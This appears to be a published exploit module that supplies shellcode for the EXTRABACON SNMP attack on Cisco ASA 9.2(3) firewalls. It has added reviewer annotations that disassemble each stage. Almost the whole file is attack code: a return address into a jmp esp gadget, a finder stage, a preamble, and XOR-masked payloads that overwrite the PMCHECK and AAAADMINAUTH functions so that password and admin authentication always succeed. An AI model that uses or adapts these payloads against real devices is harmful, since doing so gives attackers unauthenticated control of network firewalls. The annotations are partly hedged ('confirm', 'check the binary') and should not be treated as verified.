Cisco ASA 9.2(3) EXTRABACON Module / Authentication Bypass
Posted on 16 September 2016
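#
# Cisco ASA 9.2(3) Authentication Bypass (EXTRABACON Module)
#
# Copyright: (c) 2016 RiskSense, Inc. (https://risksense.com)
# License: http://opensource.org/licenses/MIT
# Release Date: September 15, 2016
#
# Authors:
#   Sean Dillon (2E3C8D72353C9B8C9FF797E753EC4C9876D5727B)
#   Zachary Harding (14C0AA3670E9501ADDFC0176298CD7A969BAA8A1)
#
# Description:
#   Additional EXTRABACON module for Cisco ASA version 9.2(3).
#   This does not use the same shellcode as the Equation Group version,
#   but accomplishes the same task of disabling the auth functions
#   in less stages/bytes.
#
# Build/Run:
#   1) Save this file to versions/shellcode_asa923.py
#   2) Add the version string to fw_version_check()
#   3) Shellcode is for --pass-disable
#
# Layout (reviewer note):
#   Each stage is declared three ways and all three MUST agree:
#     <stage>_len  - number of bytes in the stage
#     <stage>_byte - the raw bytes as a "\x.." string literal.  This is a
#                    Python 2 module; under Python 3 these literals are str
#                    objects of code points 0-255 and would need
#                    .encode("latin-1") before being put on the wire.
#     <stage>_snmp - the same bytes in dotted-decimal, the form the
#                    framework embeds in the SNMP request (and therefore the
#                    form a network signature for this module would match).
#   The published copy of this file had lost the escape backslashes
#   ("x1dx70x1dx08"), which silently turned every *_byte value into ASCII
#   text three times the declared length.  They are restored below; a
#   quick sanity check is len(X_byte) == X_len and
#   ".".join(str(ord(c)) for c in X_byte) == X_snmp for every stage.
#   All addresses are specific to the 9.2(3) lina image and must not be
#   reused for any other build.
#

vers = "asa923"

# there is a jmp esp @ 08 1d 70 1d
# 81d701c: e8 ff e4 ff ff   call 81d5520 <_ctm_hw_free@@Base+0x50fd0>
# The "ff e4" inside that call's displacement is the jmp esp, so the return
# address points one byte into the instruction: 0x081d701d, little-endian.
my_ret_addr_len = 4
my_ret_addr_byte = "\x1d\x70\x1d\x08"
my_ret_addr_snmp = "29.112.29.8"

# 8b 7c 24 14  mov edi, [esp+0x14]
# 8b 07        mov eax, [edi]
# ff e0        jmp eax
# 90           nop
finder_len = 9
finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90"
finder_snmp = "139.124.36.20.139.7.255.224.144"

# ROPgadget --binary lina_92-3 --opcode 897dfc8b1685d2
# 0x9b78010 = function
# 0x9b78000 = byte boundary
# 0x8085a40
# 0x8085000
# preamble has a stack clean up and offset to where we first hijacked execution
# 0x9277386
#
# Reviewer reading of the bytes (verify against the lina_92-3 binary):
# the two "bb" immediates are the page addresses listed above and the two
# "a3" stores write a 4-byte "xor eax,eax; inc eax; ret" stub (pushed via
# "68 31 c0 40 c3") over the functions at 0x09b78010 and 0x08085a40 — i.e.
# both auth functions are patched to return 1.  With eax = 0x7d (125) and
# "cd 80", the two syscalls look like mprotect() on each page; confirm.
preamble_len = 69
preamble_byte = (
    "\x31\xc0\x31\xdb\x31\xf6\x31\xc9"  # xor eax,eax / ebx / esi / ecx
    "\x60"                              # pusha
    "\x80\xc5\x10\x80\xc2\x07\x04\x7d"  # add ch,0x10 ; add dl,7 ; add al,0x7d
    "\x50"                              # push eax
    "\xbb\x00\x80\xb7\x09\xcd\x80"      # mov ebx,0x09b78000 ; int 0x80
    "\x58"                              # pop eax
    "\xbb\x00\x50\x08\x08\xcd\x80"      # mov ebx,0x08085000 ; int 0x80
    "\x68\x31\xc0\x40\xc3"              # push "xor eax,eax; inc eax; ret"
    "\x58"                              # pop eax
    "\xa3\x10\x80\xb7\x09"              # mov [0x09b78010], eax
    "\xa3\x40\x5a\x08\x08"              # mov [0x08085a40], eax
    "\x61"                              # popa
    "\x68\x86\x73\x27\x09"              # push 0x09277386
    "\x80\xc3\x10"                      # add bl,0x10
    "\xbf\x0b\x0f\x0f\x0f"              # mov edi,0x0f0f0f0b
    "\x89\xe5\x83\xc5\x48"              # mov ebp,esp ; add ebp,0x48
    "\xc3"                              # ret (to 0x09277386)
)
preamble_snmp = "49.192.49.219.49.246.49.201.96.128.197.16.128.194.7.4.125.80.187.0.128.183.9.205.128.88.187.0.80.8.8.205.128.104.49.192.64.195.88.163.16.128.183.9.163.64.90.8.8.97.104.134.115.39.9.128.195.16.191.11.15.15.15.137.229.131.197.72.195"

# 61  popa
# c3  ret
postscript_len = 2
postscript_byte = "\x61\xc3"
postscript_snmp = "97.195"

# six nops
launcher_len = 6
launcher_byte = "\x90" * 6
launcher_snmp = "144.144.144.144.144.144"

# 96-byte nop sled followed by a 20-byte tail:
#   b8 1d 80 be 09        mov eax,0x09be801d
#   50                    push eax
#   b8 05 60 a3 ad        mov eax,0xada36005
#   35 a5 a5 a5 a5        xor eax,0xa5a5a5a5   -> 0x0806c5a0
#   ff d0                 call eax
#   58                    pop eax
#   c3                    ret
# What lives at 0x0806c5a0 is not stated here; check the binary.
_PAYLOAD_NOP_TAIL_BYTE = "\xb8\x1d\x80\xbe\x09\x50\xb8\x05\x60\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3"
_PAYLOAD_NOP_TAIL_SNMP = "184.29.128.190.9.80.184.5.96.163.173.53.165.165.165.165.255.208.88.195"
payload_nop_len = 116
payload_nop_byte = "\x90" * 96 + _PAYLOAD_NOP_TAIL_BYTE
payload_nop_snmp = ".".join(["144"] * 96) + "." + _PAYLOAD_NOP_TAIL_SNMP

# PMCHECK disable.  The syscall arguments are XOR-masked with 0xa5a5a5a5
# because their plain values contain NUL bytes:
#   eax = 0xa5a5a5d8 ^ mask = 0x7d (125)      ebx = 0xac1225a5 ^ mask = 0x09b78000
#   ecx = 0xa5a5b5a5 ^ mask = 0x1000          edx = 0xa5a5a5a2 ^ mask = 7
# After int 0x80 the jmp/call/pop dance below loads esi with the address of
# the trailing 4-byte "xor eax,eax; inc eax; ret" stub and rep movsb copies
# it over 0x09b78010; the final "e9 0c 00 00 00" lands exactly at the end
# of the blob.  The leading "7a 30 78 30" ('z0x0') is absent from the
# AAAADMINAUTH variant, which is otherwise identical apart from the masked
# ebx value and the mov edi target.
payload_PMCHECK_DISABLE_len = 70
payload_PMCHECK_DISABLE_byte = (
    "\x7a\x30\x78\x30"                  # 'z0x0' prefix (jp +0x30 ; js +0x30)
    "\xbf\xa5\xa5\xa5\xa5"              # mov edi,0xa5a5a5a5 (xor mask)
    "\xb8\xd8\xa5\xa5\xa5\x31\xf8"      # mov eax,0xa5a5a5d8 ; xor eax,edi
    "\xbb\xa5\x25\x12\xac\x31\xfb"      # mov ebx,0xac1225a5 ; xor ebx,edi
    "\xb9\xa5\xb5\xa5\xa5\x31\xf9"      # mov ecx,0xa5a5b5a5 ; xor ecx,edi
    "\xba\xa2\xa5\xa5\xa5\x31\xfa"      # mov edx,0xa5a5a5a2 ; xor edx,edi
    "\xcd\x80"                          # int 0x80
    "\xeb\x14"                          # jmp +0x14 (to the call below)
    "\xbf\x10\x80\xb7\x09"              # mov edi,0x09b78010
    "\x31\xc9\xb1\x04"                  # xor ecx,ecx ; mov cl,4
    "\xfc\xf3\xa4"                      # cld ; rep movsb
    "\xe9\x0c\x00\x00\x00"              # jmp +0xc (end of blob)
    "\x5e"                              # pop esi (address of the stub)
    "\xeb\xec"                          # jmp -0x14 (back to mov edi)
    "\xe8\xf8\xff\xff\xff"              # call -8 (to pop esi, pushes stub addr)
    "\x31\xc0\x40\xc3"                  # stub: xor eax,eax ; inc eax ; ret
)
payload_PMCHECK_DISABLE_snmp = "122.48.120.48.191.165.165.165.165.184.216.165.165.165.49.248.187.165.37.18.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.16.128.183.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195"

# AAAADMINAUTH disable: same construction as PMCHECK without the 'z0x0'
# prefix; ebx = 0xadadf5a5 ^ 0xa5a5a5a5 = 0x08085000 and the stub is copied
# over 0x08085a40.
payload_AAAADMINAUTH_DISABLE_len = 66
payload_AAAADMINAUTH_DISABLE_byte = (
    "\xbf\xa5\xa5\xa5\xa5"              # mov edi,0xa5a5a5a5 (xor mask)
    "\xb8\xd8\xa5\xa5\xa5\x31\xf8"      # mov eax,0xa5a5a5d8 ; xor eax,edi
    "\xbb\xa5\xf5\xad\xad\x31\xfb"      # mov ebx,0xadadf5a5 ; xor ebx,edi
    "\xb9\xa5\xb5\xa5\xa5\x31\xf9"      # mov ecx,0xa5a5b5a5 ; xor ecx,edi
    "\xba\xa2\xa5\xa5\xa5\x31\xfa"      # mov edx,0xa5a5a5a2 ; xor edx,edi
    "\xcd\x80"                          # int 0x80
    "\xeb\x14"                          # jmp +0x14
    "\xbf\x40\x5a\x08\x08"              # mov edi,0x08085a40
    "\x31\xc9\xb1\x04"                  # xor ecx,ecx ; mov cl,4
    "\xfc\xf3\xa4"                      # cld ; rep movsb
    "\xe9\x0c\x00\x00\x00"              # jmp +0xc (end of blob)
    "\x5e"                              # pop esi
    "\xeb\xec"                          # jmp -0x14
    "\xe8\xf8\xff\xff\xff"              # call -8
    "\x31\xc0\x40\xc3"                  # stub: xor eax,eax ; inc eax ; ret
)
payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.245.173.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.64.90.8.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195"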